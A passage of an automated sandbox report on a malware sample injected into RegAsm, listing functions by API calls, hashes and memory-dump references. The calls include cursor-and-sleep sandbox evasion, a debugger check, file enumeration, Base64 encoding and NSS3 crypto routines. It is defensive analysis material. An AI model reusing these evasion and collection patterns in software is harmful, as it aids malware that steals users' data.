                                                                                                        • Opcode Fuzzy Hash: 1dcbc5f4e124f1828d6813ff9525a56848807dc231ada6033e2ed1fec02296a4
                                                                                                        • Instruction Fuzzy Hash: E7915D74668208CFDB58DF2DC4C095E7BA2FB87304B61C259DC84EBA19D771D982CB92
                                                                                                        Function 0040180D Relevance: 12.1, APIs: 8, Instructions: 68sleepthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • OpenInputDesktop.USER32(00000000,00000001,80000000), ref: 00401823
                                                                                                        • SetThreadDesktop.USER32(00000000), ref: 0040182A
                                                                                                        • GetCursorPos.USER32(?), ref: 0040183A
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040184A
                                                                                                        • GetCursorPos.USER32(?), ref: 00401859
                                                                                                        • Sleep.KERNEL32(00002710), ref: 0040186B
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 00401870
                                                                                                        • GetCursorPos.USER32(?), ref: 0040187F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CursorSleep$Desktop$InputOpenThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 3283940658-0
                                                                                                        • Opcode ID: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                                                                        • Instruction ID: 6ce610161f310883e20b46de56f80fe1d7998de54b5bc585690095a2dc5f2f67
                                                                                                        • Opcode Fuzzy Hash: f5ba76f92f65e2804661e56e76115090119226def0e33c1286c40128a66e7fa7
                                                                                                        • Instruction Fuzzy Hash: C9112E32E00209EBEB10EBA4CD89AAF77B9AF44301F644877D501B21A0D7789B41CB58
                                                                                                        Function 0040B93F Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 319fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                          • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                          • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                          • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                          • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                        • FindFirstFileA.KERNEL32(?,?,\*.*,00436826,?,?,?), ref: 0040B99B
                                                                                                        • StrCmpCA.SHLWAPI(?,0043743C), ref: 0040B9BC
                                                                                                        • StrCmpCA.SHLWAPI(?,00437440), ref: 0040B9D6
                                                                                                          • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                          • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                          • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                          • Part of subcall function 00407FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0040E756,?,?,?), ref: 00407FC7
                                                                                                          • Part of subcall function 00407FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0040E756,?,?,?), ref: 00407FDE
                                                                                                          • Part of subcall function 00407FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0040E756,?,?,?), ref: 00407FF5
                                                                                                          • Part of subcall function 00407FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0040E756,?,?,?), ref: 0040800C
                                                                                                          • Part of subcall function 00407FAC: CloseHandle.KERNEL32(?,?,?,?,?,0040E756,?,?,?), ref: 00408034
                                                                                                          • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                          • Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
                                                                                                          • Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E
                                                                                                        • FindNextFileA.KERNEL32(?,?), ref: 0040BEF1
                                                                                                        • FindClose.KERNEL32(?), ref: 0040BF05
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Filelstrcpy$Find$CloseCreatelstrcat$AllocFirstHandleLocalNextObjectReadSingleSizeSystemThreadTimeWaitlstrlen
                                                                                                        • String ID: \*.*
                                                                                                        • API String ID: 2390431556-1173974218
                                                                                                        • Opcode ID: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
                                                                                                        • Instruction ID: 085151aa20985cc1c24b900562e2038c57bb153a1e06efcc5d93ab1db404d891
                                                                                                        • Opcode Fuzzy Hash: da69b1b8350e13912bc50d52533819a49f7ed9dbabec5badbe691adbfc3c0016
                                                                                                        • Instruction Fuzzy Hash: 34E1DA7194012D9BCF21FB26DD4AACDB375AF44309F4100E6A508B71A1DB79AFC98F98
                                                                                                        Function 6C10545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C108A4B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ~ql
                                                                                                        • API String ID: 2221118986-1783733486
                                                                                                        • Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                        • Instruction ID: ac9ef2e964f18b224eb9de65dbefa69e730fc7efd3791de0c4f3fb40ab72352c
                                                                                                        • Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
                                                                                                        • Instruction Fuzzy Hash: E7B1D672B0421ACFDB14CF68CCA07A9B7B2EF95314F1902A9D549DB781DB30A985CF90
                                                                                                        Function 6C10542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?), ref: 6C1088F0
                                                                                                        • memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C10925C
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325466692.000000006C091000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C090000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325445154.000000006C090000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325812764.000000006C11E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3325838597.000000006C122000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c090000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memset
                                                                                                        • String ID: ~ql
                                                                                                        • API String ID: 2221118986-1783733486
                                                                                                        • Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                        • Instruction ID: 310e774a79d2d42445b23b1346e8adec51b3eacc3a5714f0b9dbf0a515220ef1
                                                                                                        • Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
                                                                                                        • Instruction Fuzzy Hash: 7BB1D572F0420ACFDB14CF58C8907EDB7B2AF95314F150269C549DBB85DB34A989CB90
                                                                                                        Function 0042B0CC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B10B
                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B134
                                                                                                        • GetACP.KERNEL32(?,?,0042B735,?,004284E6,?,000000BC,?), ref: 0042B148
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: InfoLocale
                                                                                                        • String ID: ACP$OCP
                                                                                                        • API String ID: 2299586839-711371036
                                                                                                        • Opcode ID: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
                                                                                                        • Instruction ID: 9a82d2d165bf88aca29a0bf8e749ef3f3ea21aabb57aac8d650cc6d961d67086
                                                                                                        • Opcode Fuzzy Hash: 6f20a6a568b6e14900c222ba86026eddd2a2274cf4f13b45eb98a022f40272da
                                                                                                        • Instruction Fuzzy Hash: 8901B531701626BAEB219B60BC16F6B77A8DB043A8F60002AE101E11C1EB68CE91929C
                                                                                                        Function 00408048 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42encryptionmemoryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptStringToBinaryA.CRYPT32($g@,00000000,00000001,00000000,?,00000000,00000000), ref: 00408060
                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00406724,?), ref: 0040806E
                                                                                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 00408084
                                                                                                        • LocalFree.KERNEL32(?,?,?,00406724,?), ref: 00408093
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: BinaryCryptLocalString$AllocFree
                                                                                                        • String ID: $g@
                                                                                                        • API String ID: 4291131564-2623900638
                                                                                                        • Opcode ID: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
                                                                                                        • Instruction ID: e9494377cad346e2cb6e0c3413faafdb083af89deffb74abb579b147fff80950
                                                                                                        • Opcode Fuzzy Hash: f5a436fcc5773d8d5ed11b28535eb6837d4cdf9298db33a455cb593baf526e2b
                                                                                                        • Instruction Fuzzy Hash: 7EF03C70101334BBDF315F26DC4CE8B7FA9EF06BA1F100456F949E6250E7724A40DAA1
                                                                                                        Function 0041D016 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 0041D44E
                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041D463
                                                                                                        • UnhandledExceptionFilter.KERNEL32(0043332C), ref: 0041D46E
                                                                                                        • GetCurrentProcess.KERNEL32(C0000409), ref: 0041D48A
                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 0041D491
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                        • String ID:
                                                                                                        • API String ID: 2579439406-0
                                                                                                        • Opcode ID: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
                                                                                                        • Instruction ID: db72b0d0349af5086fa5416fb06d4d65b4d62ee2eec0edc44458765686740910
                                                                                                        • Opcode Fuzzy Hash: f0bae7c02ec03e9cd254ee3e77ce7dcb23bfee01a8b87353ff1e7fdac0599424
                                                                                                        • Instruction Fuzzy Hash: 1921ABB4C01705DFD764DFA9F988A447BB4BF08316F10927AE41887262EBB4D9818F5E
                                                                                                        Function 6C2CCDC0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 423stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C2CD086
                                                                                                        • PR_Malloc.NSS3(00000001), ref: 6C2CD0B9
                                                                                                        • PR_Free.NSS3(?), ref: 6C2CD138
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeMallocstrlen
                                                                                                        • String ID: >
                                                                                                        • API String ID: 1782319670-325317158
                                                                                                        • Opcode ID: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                        • Instruction ID: 82814376ff8d378acff5324fd8d55af80424db62ace3e1ed897dc1962fab646b
                                                                                                        • Opcode Fuzzy Hash: 33f3c904727b78e6a3ccadd60312c31edcb67202b830285271c06c35c0548f6e
                                                                                                        • Instruction Fuzzy Hash: 61D15966B9164F0BEB94587C8CA13EA77938783374F580329ED219BBE5E659C8438343
                                                                                                        Function 6C26AD50 Relevance: 6.4, APIs: 4, Instructions: 389COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2a32eb0cee0860f270c348c8a63eacd4952e659addd79a2e75d48b21352d2cba
                                                                                                        • Instruction ID: 96e98d6d1008533ab51a11f4c755d5d81ea8c832691cea219e0295cb85245fe3
                                                                                                        • Opcode Fuzzy Hash: 2a32eb0cee0860f270c348c8a63eacd4952e659addd79a2e75d48b21352d2cba
                                                                                                        • Instruction Fuzzy Hash: 65F1C0B2F0122A8FDB14CF2AC8417E977B8AB4A309F15422EE945D7F40E7709985CBD0
                                                                                                        Function 6C220E20 Relevance: 6.3, APIs: 2, Strings: 2, Instructions: 279COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • memcpy.VCRUNTIME140(00000000,?,00000000,00000000,00000000), ref: 6C221052
                                                                                                        • memset.VCRUNTIME140(-0000001C,?,?,00000000), ref: 6C221086
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3325892818.000000006C131000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C130000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3325871750.000000006C130000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327036374.000000006C30E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327060794.000000006C30F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327082345.000000006C310000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3327104854.000000006C315000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_6c130000_RegAsm.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID: h("l$h("l
                                                                                                        • API String ID: 1297977491-319718214
                                                                                                        • Opcode ID: 50e450fd473cd9a416c3e540085abe8c5d4bd7ef8c6f317432a428715b1b27d8
                                                                                                        • Instruction ID: 8234fff27d3350dce5fe33950ddb26366bcedc95f79395af5cbef4c4478f57a0
                                                                                                        • Opcode Fuzzy Hash: 50e450fd473cd9a416c3e540085abe8c5d4bd7ef8c6f317432a428715b1b27d8
                                                                                                        • Instruction Fuzzy Hash: 8CA11C71B0125E9FDB08CF99C890AEEB7B6BF48314B148129ED15A7700DB39ED55CBA0
                                                                                                        Function 00411E5D Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,0065E908,?,?,?,004128A1,?,?,00000000), ref: 00411E7D
                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,?,?,?,004128A1,?,?,00000000), ref: 00411E8A
                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,004128A1,?,?,00000000), ref: 00411E91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Heap$AllocBinaryCryptProcessString
                                                                                                        • String ID:
                                                                                                        • API String ID: 1871034439-0
                                                                                                        • Opcode ID: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
                                                                                                        • Instruction ID: cc1f0cdc7ec9addca40c1236ae1a006933468a7893b1c2cc3d15f31d1535d567
                                                                                                        • Opcode Fuzzy Hash: 7facb7d2e02b845f17d999935560398eb304add6040a2be0650dedebad670ad1
                                                                                                        • Instruction Fuzzy Hash: 3F010C70500309BFDF158FA1DC849AB7BBAFF493A5B248459F90593220E7369E91EA24
                                                                                                        Function 0041C0E9 Relevance: 3.1, APIs: 2, Instructions: 63timeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetLocalTime.KERNEL32(?,759183C0,00000000,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C13E
                                                                                                        • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,0041C5A4,?), ref: 0041C14C
                                                                                                          • Part of subcall function 0041B92A: FileTimeToSystemTime.KERNEL32(?,?,?,?,0041C211,?,?,?,?,?,?,?,?,?,?,0041C5B4), ref: 0041B942
                                                                                                          • Part of subcall function 0041B906: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041B923
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                        • Associated: 00000002.00000002.3293044181.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
